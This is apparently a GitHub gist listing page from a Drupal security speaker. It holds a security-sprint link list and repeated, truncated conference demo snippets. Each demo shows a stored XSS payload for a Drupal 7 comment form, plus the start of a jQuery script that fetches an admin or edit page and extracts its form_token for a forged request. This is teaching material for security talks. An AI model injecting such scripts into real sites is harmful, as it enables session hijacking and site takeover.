Balázs János Tatár tatarbj
tatarbj
/ Security improvements sprint in DrupalCamp Ruhr 2018
Last active
February 26, 2018 13:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Links: | |
| drupal core with security filter: https://www.drupal.org/project/issues/search/drupal?text=&assigned=&submitted=&project_issue_followers=&status%5B%5D=13&status%5B%5D=8&version%5B%5D=8.x&issue_tags_op=%3D&issue_tags=security | |
| drupal core with Security improvements filter: https://www.drupal.org/project/issues/search/drupal?text=&assigned=&submitted=&project_issue_followers=&issue_tags_op=%3D&issue_tags=Security+improvements | |
| Full project applications: https://www.drupal.org/project/issues/projectapplications | |
| Prioritized list of full project applications: https://www.drupal.org/project/issues/search/projectapplications?status[]=8&status[]=14&issue_tags=PAReview%3A+review+bonus | |
| Security documentations: https://www.drupal.org/docs/develop/security | |
| Categories: | |
| - newbies with no coding knowledge: | |
| (type should be to review security related pages and propose improvements on them from non-coding pov) |
tatarbj
/ drupaleurope demo
Last active
September 17, 2018 12:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalcamposlo demo
Created
November 9, 2018 21:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ drupalcamplondon
Created
February 28, 2019 15:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalmountaincamp
Created
March 4, 2019 18:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ drupalcampspain
Created
May 7, 2019 12:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ DrupalCamp Belarus
Created
May 16, 2019 10:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ Drupalcamp Kyiv
Created
May 24, 2019 23:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/1 comment form with full html input format by uid0. | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); |
tatarbj
/ DrupalCamp Poland
Last active
June 1, 2019 12:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form again | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
tatarbj
/ DrupalCamp Pannonia
Created
July 20, 2019 17:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d7 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| #1 d7 site: node/2 comment form again | |
| <script> | |
| jQuery.get(Drupal.settings.basePath + 'node/2/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; |
OlderNewer